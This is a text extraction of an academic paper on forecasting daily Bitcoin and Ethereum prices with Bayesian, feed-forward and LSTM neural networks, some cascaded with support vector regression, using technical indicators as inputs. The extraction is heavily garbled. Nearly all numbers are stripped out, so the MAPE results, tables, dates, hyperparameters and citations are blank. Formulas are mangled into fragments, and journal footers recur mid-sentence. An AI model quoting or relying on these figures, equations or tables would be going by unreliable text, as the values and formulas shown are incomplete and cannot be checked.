applying any specific trading strategy. results show that chartists, who adopt the trading rules selected by a genetic algorithms that optimizes their parameters, are able to achieve higher profits. let us quote other relevant works. shintate & pichl ( ), ji, kim & im ( ), livieris et al. ( ), lamothe-fernández et al. ( ), and chen, li & sun ( ) predicted bitcoin price at different frequencies using several machine learning techniques and investigating the importance of the sample dimension. greaves & au ( ) investigated the predictive power of blockchain network-based features on the bitcoin price. they found a low predictive power embedded in these network features probably because bitcoin price is technically dictated by exchanges’ behaviors. akcora et al. ( ) introduced the concept of k-chainlets expanding the concepts of motifs and graphlets to blockchain graphs. they found that certain types of chainlets have a high predictive power for bitcoin prices. lahmiri & bekiros ( ) implemented deep learning techniques to forecast the price of the three cryptocurrencies, bitcoin, digital cash and ripple, finding that these three digital currencies exhibit fractal dynamics, long memory and self- similarity. indera et al. ( ) presented a multi-layer perceptron-based non-linear autoregressive with exogeneous inputs (narx) model to predict bitcoin price starting from the opening, closing, minimum, maximum past prices and a technical indicator, the cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ well-known moving average. munim, shakil & alon ( ) forecasted bitcoin price using the autoregressive integrated moving average (arima) and neural network autoregression (nnar) models. uras et al. ( ) segmented each analyzed financial time series into short partially overlapping sequences in such a way that these sequences do not resemble a random walk. the authors identified a train and a test set within each time regime/sequence. then, in each identified sequence they applied different forecasting procedures—simple linear regression, multiple linear regression, multilayer perceptron and the long short-term memory. mudassir et al. ( ) presented high-performance machine learning-based classification and regression models for predicting bitcoin price movements and prices in short and medium terms. among the machine learning techniques used by the authors there is the stacked ann (sann), constituted of ann models that are used to train a larger ann. the sann was trained using the training dataset and the -fold cross-validation, by training each of ann models on a separate fold. the final larger ann learns from these five models, that is, it trains on the outputs of the five individual smaller anns. all the cited works focus on end-of-day closing price forecast and/or price movements forecasting for the next day prices, but the work by patel et al. ( ) and the last work quoted, that by mudassir et al. ( ). the former focuses on forecasts for – , and days in advance, instead the latter focuses on end-of day, short-term ( days) and mid-term ( and days) forecasts. in this work we focus on end-of day, short-term ( days) and mid-term ( days) forecasts. finally, we quote the works by jang et al. ( ), chih-hung, yu-feng & chih-hung ( ), pant et al. ( ), mcnally, roche & caton ( ), phaladisailoed & numnonda ( ), roy, nanjiba & chakrabarty ( ), and by velankar, valecha & maji ( ) that are published in the proceedings of recent international conferences and deal with the prediction of the bitcoin price using machine learning techniques. to the best of our knowledge, our work is the first attempt of predicting the bitcoin price investigating the best architecture by the so called k-fold cross-validation method, applying it only to a part of the whole dataset, as described in details in section framework’s calibration and performance metric. in modern applied machine learning in order to tune model hyper parameters the definition of the k-fold cross-validation method often replaces the definitions of training, validation and test data set for preventing overfitting. in their book kuhn & johnson ( ) wrote: …we must use the existing data to identify settings for the model’s parameters that yield the best and most realistic predictive performance (known as model tuning). traditionally, this has been achieved by splitting the existing data into training and test sets. the training set is used to build and tune the model and the test set is used to estimate the model’s predictive performance. modern approaches to model building split the data into multiple training and testing sets, which have been shown to often find more optimal tuning parameters and give a more accurate representation of the model’s predictive performance. cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this is because using a sole test set or a validation set has many limitations, as discussed by kuhn & johnson ( ), brownlee ( c), anguita et al. ( ), and rodriguez, perez & lozano ( ). it is worth underlining that every machine learning model always has some error because it is a model. kuhn & johnson ( ) wrote: many modern classification and regression models are highly adaptable; they are capable of modeling complex relationships. however, they can very easily overemphasize patterns that are not reproducible. without a methodological approach to evaluating models, the modeler will not know about the problem until the next set of samples are predicted. in statistics a common aphorism, that is generally attributed to the statistician george box, goes all models are wrong and is often expanded as all models are wrong but some are useful. this aphorism applies also to the choice and preparation of data, choice of hyperparameters, and the interpretation of model predictions. in this work we attempted of predicting the bitcoin price investigating the best architecture by the k-fold cross-validation method, and using the monte carlo method to handle the stochastic nature of the neural networks, hence providing statistics to summarize the performance of the best selected models. this approach is not always applicable due to the long training times of some models. the monte carlo method as well as all methods and tools from probability provide a way to handle the random nature of the predictive modeling problems. note that, as we are going to describe in next sections, our results are comparable with those in literature despite the proposed frameworks are relatively simple in comparison to those proposed previously in literature. there are works that propose a framework using a high number of inputs, deep neural networks (dnn), convolutional neural networks (cnn) and complex stacking ensemble models (see for example the ensemble model proposed by ji, kim & im ( ), in which the first level consists dnn, lstm, and cnn, and the second level consists of a single dnn model). proposed frameworks in this work we compare the performance of the single stage frameworks, formed by an nn (bnn, ffnn, or lstmnn), with the performance of the two stages frameworks, formed by an nn in cascade to an svr. all frameworks aim to predict the daily closing bitcoin and ethereum price at (t + n)th day, with n = , n = , and n = , starting from the value of five technical indicators, sma, ema, mom, rsi and macd, at tth day. in the following we briefly describe the technical indicators and the ml techniques adopted in this work. technical indicators the five indicators above mentioned are indicators well known in the technical analysis (kirkpatrick & dahlquist, ). they are mathematical constructions used to process technical analysis forecasts the move- ments of the financial assets’ prices through the study of past market data, such as price and volume. cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data, for example on the price trend and on the volumes traded of a financial security in order to predict its future price performance and get buy and sell signals . moving averages moving averages, sma and ema, are basic indicators for determining price trends. they are defined as follows: smat ¼ n xn pt ( ) and emat ¼ emat� þ n þ ðpt � emat� Þ ( ) where p is the price and n is the used period. both are calculated by averaging a certain number of past data. the main difference is that in the ema the data are weighted, and old data have less weight than recent data . owing to the high volatility of the bitcoin price, we dealt with short term moving averages, which usually take into account periods between and days. in this work we considered moving average on periods equal to days. oscillators contrary to the moving averages, macd, rsi and mom are called oscillators because their value oscillates in a sinusoidal manner between a minimum and a maximum. they can be useful for identifying points of excessive price increase or excessive price decrease, and points of possible change in the direction of prices. macd considers the difference between the values of two moving averages (macd line), one is a short period ema and the other is a long period ema, together with an exponential moving average of this difference (signal line) and a histogram given by the distance between the macd line and the signal line. it is defined as follows: shortema ¼ : pt þ : shortemat� ( ) longema ¼ : pt þ : longemat� ( ) and macd ¼ shortema � longema ( ) and -day averages usually determine the macd line, while the -day average determines the signal line. in this work we considered these values to compute the macd. rsi is a technical indicator of momentum useful for identifying the phases of oversold and overbought asset. it is defined as follows: rsi ¼ upavg upavg þ dnavg ( ) for more details see http://mrjbq . github.io/ta-lib/funcs.html, a link in which the functions of the library ta- lib, used to compute these technical indicators, are explained. ema value at t is based on the previous ema value at t :amp:minus; . the initial value for ema at t :amp:minus; will be an sma value calculated using a period equal to that used in ema. cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://mrjbq .github.io/ta-lib/funcs.html http://mrjbq .github.io/ta-lib/funcs.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where upavg ¼ upavgt� � ðn � Þ þ up n dnavg ¼ dnavgt� � ðn � Þ þ dn n and n is the used period to compute this indicator, up = pt − pt− and dn = if pt > pt− , otherwise up = and dn = pt− − pt. areas of overbought indicate a time when prices go too far above their average period, and given that the price is now too high we can expect an imminent return of prices downwards (sell signal). areas of oversold indicate a time when prices have pushed too low compared to their average and therefore we expect an imminent bullish return movement towards their average (buy signal). rsi values range from to . over points there is an overbought signal, and under an oversold signal. mom measures the rate of change of any instrument. it compares the current price with the price of some previous periods: mom ¼ pt � pt�n ( ) in this work we set the period used by this oscillator equal to days. machine learning techniques all ml techniques adopted in this work operate in a supervised context. the training takes place by presenting to the network inputs (training dataset) whose output is known, hence by presenting to the network the data set (xn, yn), where each data point in input xn rd, whereas the output yn r. bayesian neural network contrary to other types of neural networks, such as the ff and the lstm, which find a weighted array that maximizes the fitting of the nn outputs with respect to training outputs, following the principle of maximum likelihood, the bnns follow the bayesian approach. in the maximum likelihood, the learning aims at finding a single network—“the best”—the one that makes the smallest error on training data. as a result, at the end of the training, we get a single weight array. on the contrary the bayesian approach considers a probability distribution for the weights. at the end of the training we have more than one network and the output is computed as the expected value of the outputs generated by all these networks. in deeper detail, in an bnn the weights and the outputs are assumed to be sampled from a distribution. let us define the bnn taken into account in this work. it has an input with d dimensions and two hidden layers, whose dimensions are hl and hl , cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ respectively. for such a network the parameters u ¼ v ; v ; v ; b ; b ; b f g are defined as follows: v rd�hl ; v rhl �hl ; v rhl � ; b rhl ; b rhl ; and b r the activation functions that allow to pass from a layer to another are defined by rectified linear unit activations, hence our nn network is defined as follows : nn : rd ) rhl ) rhl ) r and a data point in input x pass through the following layers: x ) h ¼ maxð ; v tx þ b Þ ) h ¼ maxð ; v tx þ b Þ ) v th þ b the prior distribution on the weights is defined as a standard normal distribution, as follows: pðuÞ ¼ normalðuj ; iÞ (where is a zero matrix and i is a identity matrix), and the likelihood for each data point (x, y) is given by: pðyjx; uÞ ¼ pðdjuÞ ¼ normalðyjnnðx; uiÞ; s Þ where d denotes the training dataset, hence it represents all data points to be presented to the network during the training, and s y is a fixed variance set equal to . given the prior and the likelihood, the posterior distribution p(θ, x) is approximated by a parametrized family q(θ, λ) through a variational inference method minimizing the kullback–leibler divergence between the two distributions q and p. note that the data are scaled to be centered and have unit variance. once estimated the posterior distribution, that is the distribution of the weights θ of the bnn, we can compute the posterior predictive distribution for testing data points in input xtest. this distribution is given by: pðyjxtest; uÞ ¼ z normalðyjnnðx; uÞ; s ÞpðujdÞdu it can be computed using the monte carlo approximation: pðyjxtest; uÞ� nsamples xnsamples� i¼ nðyjnnðxtest; uiÞ; s Þ we sampled it from the posterior, that is from the distribution q(θ, λ *). this implies sampling the weights θ, which gives nn(xtest, θi) with i ¼ . . . m where m is the number of extracted samples. m values of nn(xtest,θi), that is m values of y, are associated to each data point xtest belonging to the testing dataset. since to each xtest in input must correspond in output only see http://edwardlib.org/tutorials/ bayesian-neural-network and https:// github.com/mikkokemppainen/jupyter_ notebooks/blob/master/edward_ notebook_public.ipynb. see http://edwardlib.org/tutorials/klqp. cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://edwardlib.org/tutorials/bayesian-neural-network http://edwardlib.org/tutorials/bayesian-neural-network https://github.com/mikkokemppainen/jupyter_notebooks/blob/master/edward_notebook_public.ipynb https://github.com/mikkokemppainen/jupyter_notebooks/blob/master/edward_notebook_public.ipynb https://github.com/mikkokemppainen/jupyter_notebooks/blob/master/edward_notebook_public.ipynb https://github.com/mikkokemppainen/jupyter_notebooks/blob/master/edward_notebook_public.ipynb http://edwardlib.org/tutorials/klqp http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ one value of y, we have to compute the posterior predictive distribution for each xtest in the testing dataset. due to the computational complexity, we grouped all the sample predictions into histograms forming the posterior predictive distribution as a mixture distribution according to these histograms . we computed the prices’ prediction sampling from this mixture, computing the mean. feed forward and long short term memory neural network as regards the other two neural networks taken into account in this work, the ffnn and the lstmnn, the main difference between them is that the former is composed of a series of layers of neurons connected without cycles, whereas the latter is characterized by the presence of cycles and is able to consider long-term dependencies among data. specifically, we implemented an ffnn, composed of layers, an input layer, a hidden layer and an output layer as in work by patel et al. ( ). the input layer takes in input the five technical indicators, and the output layer predicts the price at (t + n)th day. we initialized the network’s weights to a random number generated from a uniform distribution, used a tangent sigmoid as activation function in the first two layers, and a linear activation function in the output layer, as in the work patel et al. ( ). the output layer of the neural network has only one neuron and the value, it returns, is compared with the true value. we implemented an lstmnn having a visible layer with in input the five technical indicators, a hidden layer with nn neurons, also called lstm blocks, and an output layer that predicts the price at (t + n)th day. the default sigmoid activation function is used for the lstm blocks. we trained both the networks for ne epochs and used a batch size of nb and adam as optimization algorithm to update network weights (kingma & adam, ). this algorithm is based on the gradient descent that minimizes an objective function, in our case the mean absolute error (mae) of the output produced by the nns with respect to the desired output. support vector regression let us conclude this brief overview with the ml technique used in the two stages frameworks, svr. it belongs to a set of supervised learning methods that can be used both for classification and for regression computation. in a problem of classification, this technique is called support vector machines (svm). for instance, it can be used to divide the set of training data in two classes; an svm is able to identify the hyperplane having the maximum margin of separation between the two classes. to this purpose, the training data set is mapped in a space called feature space using non-linear functions, ψ, called feature functions, which are a combination of the so called kernel functions. they map a lower dimensional data into a higher dimensional data. in a regression problem, svr tries to keep the fitting error within a certain threshold. indeed, the goal of this ml technique is to find a function ψ that deviates from the observed value by a value no greater than ε for each training point. a mixture distribution is the probability distribution of a random variable that is derived from a collection of other ran- dom variables as follows: first, a random variable is selected by chance from the collection according to given prob- abilities of selection, and then the value of the desired random variable is obtained (http://edwardlib.org/api/ed/ models/mixture). cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://edwardlib.org/api/ed/models/mixture http://edwardlib.org/api/ed/models/mixture http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the kernel functions more used, and adopted also in this work are the following. � linear: kðxi; yjÞ ¼ xti yj. � polynomial: kðxi; yjÞ ¼ ðcxti yj þ rÞd, being d the degree of the polynomial function. � radial basis function: k(xi,yj) = exp(−γ||xi − xj|| ), with γ > . frameworks’ calibration and performance metric we analyzed the time series of bitcoin and ethereum daily closing prices. specifically, the dataset taken into account includes daily closing price’s values from january st, to april th, , for a total of , values. starting from these series we computed the time series of the five technical indicators, that are the inputs of our frameworks, and the features xn of the dataset (xn, yn), including the training and testing datasets. the bitcoin daily price time series defines the output yn of such dataset. summary statistics for the five inputs and the output are described in table for bitcoin and ethereum price time series. to evaluate the performance of the proposed single stage and of the two stages frameworks, we computed the mean absolute percentage error (mape), defined as follows: � n xn t¼ jat � ftj jatj � where at and ft are the actual and forecast prices, respectively, at time t. as regards the calibration of the used ml techniques, we tuned the model hyper parameters, that is the parameters whose values are set before starting the learning process, using the k-fold cross-validation method (see works by kuhn & johnson ( ), table summary statistics for the five inputs and the output for bitcoin and ethereum prices. max min mean standard deviation btc sma , . . , . , . ema , . . , . , . mom , . − , . , . macd , . − , . . . rsi . . . . close , . . , . , . eth sma , . . . . ema , . . . . mom . − . . . macd . − . . . rsi . . . . close , . . . . cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ brownlee ( c), and rodriguez, perez & lozano ( )). the k-fold cross-validation method implies the creation of several neural network architectures and the training of every architecture at each k-fold. for each architecture and for each k-fold the mape value is computed. the average of the mape’s k values across the k-folds for a given architecture represents the performance of that architecture. the architecture with the lowest average is the best. it represents the model that has to be trained on all data. the k-fold cross-validation method works as described by the following pseudo-code: start: #split data into training and testing dataset traindata, testdata = split(alldata) #tune parameters of the model parameters = … k = … archskills = list() for p in parameters do k-fold_skills = list() for i in do k-fold _train, k-fold_val = split(i, k, traindata) model = fit (k-fold-train, p) skill_estimate = evaluate(model, k-fold_val) end for # for each k-fold calculate mape and store the average skill = summarize(k-fold_skills) archskills.append(skill) end for #evaluate the model with the best tuning with all data model = fit(traindata) skill = evaluate(model, testdata) end. we applied the k-fold cross-validation method with k = – % of the whole dataset. we used the k-fold method with an expanding window, hence we divided the data set in three folds/splits as illustrated in fig. . as underlined by kuhn & johnson ( ) a formal rule to choose the value of k does not exist. since our data set size is not large enough three should be an acceptable value for k. we repeated the k-fold cross-validation method several times, choosing at the end the tuning that provides the architecture having the best performance. as regards the hyper parameters of the bnn, one, two, and three hidden layers, nhl, were tested, with combinations of , , , , and neurons, nn. as regards the hyper parameters of the other ml techniques adopted (ffnn, lstmnn and svr), they were selected running sixty monte carlo runs, and taking in each run a different constellation. the hyper parameters that must be selected, are the number of epochs, ne, the number of neurons, nn, the number of batches, nb, the degree of the polynomial kernel, d, the value of γ (that is a parameter of the radial basis kernel). for each of them we tested the k-fold method with both an expanding window and a sliding window, and at the end we chose an expanding window given that with it we obtained the best results. cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we defined the range in which they vary, as follows : ne ∈ [ , ], nn ∈ [ , ], nb ∈ [ , ], d ∈ [ , ], γ ∈ [ . , ]. once the best architecture is selected, we train it with all data, considering the testing set equal to % of the whole data set, that is the part of the data set not used in the k-fold method. to evaluate the robustness of the selected architecture’s performance we repeated this procedure forty times, applying the so called monte carlo method. the performance of each proposed framework are measured by the average and the standard deviation of the mape’s values across the monte carlo runs , . results as just described, to tune our frameworks we applied the k-fold cross-validation method to % of the whole data set, using k = , an expanding window, and respecting the temporal order of the series. for each defined architecture, we applied this method computing the prediction at (t + n)th day ahead of time, with n = and the mape’s values for each fold. the k-fold cross-validation method was run once for each different constellation of the main parameters of each framework, since our goal is to select the best model/architecture for ann and the best model for bnn, in order to compare the performance of these two kind of nns. table reports the measure of the best performance for each proposed framework, and their hyper parameters, ne, nn, nb, γ, d, and nhl. precisely for all frameworks under study, the average and the standard deviation (values in brackets) of the mape’s values across the k-folds are described. the analysis performed highlighted the following patterns (see table ). firstly, the two stages frameworks perform better than the correspondent one stage frameworks, but for the bnn and svr(r)+lstmnn. secondly, the ann’s performance is higher than those of bnn. thirdly, the two stages frameworks composed of svr, using a linear kernel function performs better than other two kinds of kernels. for ann the best architecture selected corresponds to a two stages framework, composed of svr + lstmnn, in which the svr uses a linear kernel function and the lstmnn uses for training ne = , nn = , and nb = . for this framework we obtained the lowest average of the mape’s values across the k-folds. this average value is equal to . (std. . ). figure the figure shows as % of the whole data set is divided into -folds/splits, and as the expanding window approach, used to cross validation, works. full-size doi: . /peerj-cs. /fig- note that all the parameters not men- tioned here are defined as described in section proposed frameworks or, given that we used the well known python libraries, sklearn and keras, are set equal to the default values. it is worth to underline that a classifi- cation model could also be considered, since low mape values do not neces- sarily mean that the model predicts the price rise and fall correctly. classifica- tion models will be taken into account in our future work, but they are out of scope of this first paper. in this work we trained all our frameworks for some days on a laptop with an intel(r) core(tm) i - u cpu @ . ghz . ghz, gb ram and graphic card intel hd . cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ contrary to ann, for bnn the k-fold cross-validation method identifies, as the best architecture, the one stage framework, in which the bnn follows the configuration described in section bayesian neural network, with two hidden layers and neurons. for this framework the average of the mape’s values across the k-folds, is equal to . (std. . ). once selected the best models we trained the model using the whole data set and compared the results. in order to evaluate the robustness of the selected models we run forty monte carlo runs, computing for each run the mape value at (t + n)th day ahead of time, with n = , n = , and n = . for ann, and specifically, for the svr+lstmnn the average and standard deviation of the mape’ values across monte carlo simulation are equal to . and . , to . and . , and to . and . , respectively for n = , n = , and n = day ahead of time. for bnn the average and standard deviation of the mape’ values across monte carlo simulation are equal to . and . , to . and . , and to . and . , respectively for n = , n = , and n = day ahead of time. of course all these values of mape increase while n goes from to and to , since the performance decreases while the day ahead of time increases (see table ) . table parameters and statistics of the best selected architecture for each proposed framework, in order to predict the bitcoin price, are described. statistics represent the average and standard deviation (in brackets), across the k-folds with k = , of the mape values. note that (r) stands for svr with a radial kernel function, (l) stands for svr with a linear kernel function, and (p) stands for svr with a poly- nomial kernel function. the bold entries highlight the framework with the lowest average of the mape’s values across the k-folds. lstmnn svr (r) + lstmnn svr (l) + lstmnn svr (p) + lstmnn # epochs # neurons # batchs γ . d avg (std) . ( . ) . ( . ) . ( . ) . ( . ) ffnn svr (r) + ffnn svr (l) + ffnn svr (p) + ffnn # epochs # neurons # batchs γ . d avg (std) . ( . ) . ( . ) . ( . ) . ( . ) bnn svr (r) + bnn svr (l) + bnn svr (p) + bnn nhl # neurons γ . d avg (std) . ( . ) . ( . ) . ( . ) ( . ) note that the procedure for tuning the model hyperparameters using the k-fold cross-validation method was applied considering the btc price prediction at (t + n)th day ahead of time, with n = . it has to apply for each n ! = to select for each n the best architecture. cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ these results show that predicted bitcoin prices by the bnn with n = have a mape very similar to that found by mallqui & fernandes ( ), albeit the periods analyzed are different. in fact, our work considers time series that range from january st, to april st, ; mallqui & fernandes ( ) considered two different periods. they found a mape value equal to . for the first interval, ranging from august th, to july th, , and equal to . for the second interval ranging from april st, to april st, , very close to our mape value of . and . respectively obtained applying bnn and svr+lstm. our predicted btc prices are also very close to that finding in the work by mudassir et al. ( ) by applying the so called svm and considering the interval from april , to december , , hence considering also the btc prices after april , as we did. the highest volatility of the btc prices was after april , as underlined in the work just quoted. mudassir et al. ( ) considered three data intervals: from april , to july , ; from april , to april , ; and the interval from april , to december , . for the last of the three intervals the authors found a mape value of . for ann, of . for lstmnn, . for svm, and of . for sann. lower mape values were found for the first two intervals. this is because the btc prices volatility is not much high, and btc prices are relatively stable, even if in the second interval btc prices are noticeably higher toward the end. similar analysis was performed also for another cryptocurrency, specifically for ethereum. obtained results are shown in tables and . results described in table highlight that the two stages frameworks for ann, composed of svr, using linear and polynomial kernel functions, perform better than the correspondent one stage frameworks and two stages framework composed of svr, using a radial kernel function; and the bnn’s performance is higher than all the others. table describes the average and standard deviation of the mape’s values across monte carlo simulations for the best selected architecture, svr+ffnn and bnn. best results are obtained for bnn as in the case of bitcoin even if the mape value is slightly higher for etherem, . ( . ) vs. . ( . ) for bitcoin. note that also in this case mape values increase while n goes from to . we conclude this section presenting the predicted bitcoin prices at (t + )th day ahead of time by the bnn in one of the monte carlo simulations performed. table describes the mean, the standard deviation, and the . and . quantiles of just ten predicted values, and gives an idea of how much the predicted values differ from the true values for table average and standard deviation (in brackets) for mape values across the performed mc runs obtained by training the selected best architectures using the whole data set to predict bitcoin price. svr (l) + lstmnn bnn n = . ( . ) . ( . ) n = . ( . ) . ( . ) n = . ( . ) . ( . ) cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ n = . the first column in the table describes the actual value of the bitcoin price. specifically these prices refer to the bitcoin price from may th, to may st, . they are the first ten values of the bitcoin price into the testing dataset. the second column describes the average values predicted by the bnn for each actual value reported in the first column. remember that the output of the bnn are assumed to be sampled from a distribution, consequently to give an idea of the results’s goodness in the table we illustrate for each predicted price also the standard deviation, and the . and . quantiles. for this monte carlo simulation the mape value is equal to . . table parameters and statistics of the best selected architecture for each proposed framework, in order to predict the ethereum price, are described. statistics represent the average and standard deviation (in brackets), across the k-folds with k = , of the mape values. note that (r) stands for svr with a radial kernel function, (l) stands for svr with a linear kernel function, and (p) stands for svr with a polynomial kernel function. the bold entries highlight the framework with the lowest average of the mape’s values across the k-folds. lstmnn svr (r) + lstmnn svr (l) + lstmnn svr (p) + lstmnn # epochs # neurons # batchs γ . d avg (std) . ( . ) . ( . ) . ( . ) . ( . ) ffnn svr (r) + ffnn svr (l) + ffnn svr (p) + ffnn # epochs # neurons # batchs γ . d avg (std) . ( . ) . ( . ) . ( . ) . ( . ) bnn svr (r) + bnn svr (l) + bnn svr (p) + bnn nhl # neurons γ . d avg (std) . ( . ) . ( . ) . ( . ) . ( . ) table average and standard deviation (in brackets) for mape values across the performed mc runs obtained by training the selected best architectures using the whole data set to predict ethereum price. svr (p) + lstmnn bnn n = . ( . ) . ( . ) n = . ( . ) . ( . ) n = . ( . ) . ( . ) cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conclusions in this article, several ml frameworks to forecast bitcoin and ethereum prices are comparatively tested. they are divided into one stage frameworks and two stages frameworks. the formers are frameworks based on just one ml technique. the latters are based on two ml techniques working in cascade. we used three one stage frameworks, and three two stages ones. the first three use different nn models. specifically, we considered bnn, ffnn and lstmnn. the second ones use an ffnn, an lstmnn, and an bnn, each of them in cascade to an svr. the goal of this work was to analyze the performance of bnn in the forecasting the bitcoin and ethereum daily closing prices, and to compare it with those obtained using ffnn and lstmnn, considering both the typologies of frameworks. all frameworks attempt to predict the prices starting from five technical indicators, sma, ema, mom, macd, and rsi. specifically, in the one stage frameworks starting from the value of these five technical indicators at tth day, we predicted the daily closing price at (t + n)th day, with n = , n = , and n = . in the two stages frameworks the first stage, formed by an svr, receives in input the five technical indicators at tth day and predicts the value of the five technical indicators at (t + n)th day; the second stage receives in input the estimate of five technical indicators at (t + n)th day and predicts the daily closing price at (t + n)th day. we tuned all the proposed framework applying the k-fold cross-validation method to % of the whole data set. we created several models training them at each k-fold, hence computing for each fold a mape’s value. then, for each model we computed the average of the mape’s values across the k-folds. the model with the lowest average results to be the best. it represents the model that has to be trained on all data. we selected the best model for the ann and the best model for bnn. the former corresponds to a two stages framework, and the latter corresponds to a one stage framework, both for bitcoin and ethereum price prediction. table statistics on ten samples of predicted bitcoin price expressed in us$ at (t +n)th day ahead of time, with n = , using bnn. note that these values refer to the first ten samples of the testing dataset. the corresponding actual values are shown in the first column. actual value mean std . quantile . quantile , . , . , . , . , . , . . , . , . , . , . . , . , . , . , . , . , . , . , . . , . , . , . , . . , . , . , . , . . , . , . , . , . . , . , . , . , . . , . , . , . , . . , . , . cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ results show that the predicted bitcoin prices by the bnn have a mape in accord with those reported in the works present in the literature. furthermore, the performance of some proposed two stages frameworks, svr+ffnn and svr+lstmnn, show a clear improvement with respect to those of the correspondent one stage frameworks, and the goodness of some two stages frameworks’ predictions is close to that obtained by the bnn. the goal of this work is to give useful insights to build efficient frameworks for trading. the proposed frameworks could be used to decide when and how much to invest, and also to build efficient bitcoin trading strategies in a market highly volatile, in which short term trading may give several opportunities to make profit when correct trading strategies are applied. the novelty of this work consists in the model selection, by applying the k-fold cross- validation method to % of the whole dataset, and in applying the monte carlo method during the training phase of the best selected architectures that takes the whole dataset into account, to predict cryptocurrency markets, specifically the bitcoin and the ethereum market. future work aims to perform a more exhaustive optimization of all the proposed frameworks in this work, and to analyze their response in the case in which more inputs are taken into account. in fact, it is reasonable thinking that a more exhaustive optimization of the proposed frameworks and more inputs to train the networks will allow to obtain even higher performance. additional information and declarations funding this research is supported by the research projects funded by the sardegna ricerche public body, por sardegna fesr / eu grants: “sardcoin - sardcoin: tecnologie blockchain a supporto del turismo in sardegna”; top-down cluster projects; “easywallet”; r&d grants for r&d projects; “crypto-trading”- r&d grants for r&d projects. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: sardegna ricerche public body, por sardegna fesr: / . competing interests the authors declare that they have no competing interests. author contributions � luisanna cocco conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � roberto tonelli conceived and designed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. � michele marchesi conceived and designed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. data availability the following information was supplied regarding data availability: data files are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abraham d, higdon d, nelson j, ibarra j. . cryptocurrency price prediction using tweet volumes and sentiment analysis. smu data science review ( ): – . akcora c, dey ak, gel y, kantarcioglu m. . pakdd: forecasting bitcoin price with graph chainlets. pakdd. available at https://cakcora.github.io/blockchain/ .pdf. anguita d, ghelardoni l, ghio a, oneto l, ridella s. . the ’k’ in k-fold cross validation. in: european symposium on artificial neural networks, computational intelligence and machine learning, – april . bruges, – . brownlee j. a. how to convert a time series to a supervised learning problem in python. available at https://machinelearningmastery.com/convert-time-series-supervised-learning- problem-python/ (accessed november ). brownlee j. b. multistep time series forecasting with lstms in python. available at https://machinelearningmastery.com/multi-step-time-series-forecasting-long-short-term- memory-networks-python/ (accessed november ). brownlee j. c. what is the difference between test and validation datasets? available at https://machinelearningmastery.com/difference-test-validation-datasets/ (accessed november ). chen z, li c, sun w. . bitcoin price prediction using machine learning: an approach to sample dimension engineering. journal of computational and applied mathematics ( ): doi . /j.cam. . . chih-hung w, yu-feng m, chih-hung l. . a new forecasting framework for bitcoin price with lstm. in: ieee international conference on data mining workshops (icdmw). cocco l, tonelli r, marchesi m. . an agent-based artificial market model for studying the bitcoin trading. ieee access ( ): doi . /access. . greaves as, au b. . using the bitcoin transaction graph to predict the price of bitcoin. available at https://pdfs.semanticscholar.org/a ce/ c ffa da add .pdf. huang jz, huang w, ni j. . predicting bitcoin returns using high-dimensional technical indicators. journal of finance and data science ( ): – doi . /j.jfds. . . . indera ni, yassin i, zabidi a, rizman zi. . non linear autoregressive with exogenous input (narx) bitcoin price prediction model using pso-optimized parameters and moving average technical indicators. journal of fundamental and applied sciences ( s): – doi . /jfas.v i s. . cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://cakcora.github.io/blockchain/ .pdf https://machinelearningmastery.com/convert-time-series-supervised-learning-problem-python/ https://machinelearningmastery.com/convert-time-series-supervised-learning-problem-python/ https://machinelearningmastery.com/multi-step-time-series-forecasting-long-short-term-memory-networks-python/ https://machinelearningmastery.com/multi-step-time-series-forecasting-long-short-term-memory-networks-python/ https://machinelearningmastery.com/difference-test-validation-datasets/ http://dx.doi.org/ . /j.cam. . http://dx.doi.org/ . /access. https://pdfs.semanticscholar.org/a ce/ c ffa da add .pdf http://dx.doi.org/ . /j.jfds. . . http://dx.doi.org/ . /jfas.v i s. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ jang h, lee j. . an empirical study on modeling and prediction of bitcoin prices with bayesian neural networks based on blockchain information. ieee access : – doi . /access. . . jang h, lee j, ko h, lee w. . predicting bitcoin prices by using rolling window lstm model. in: 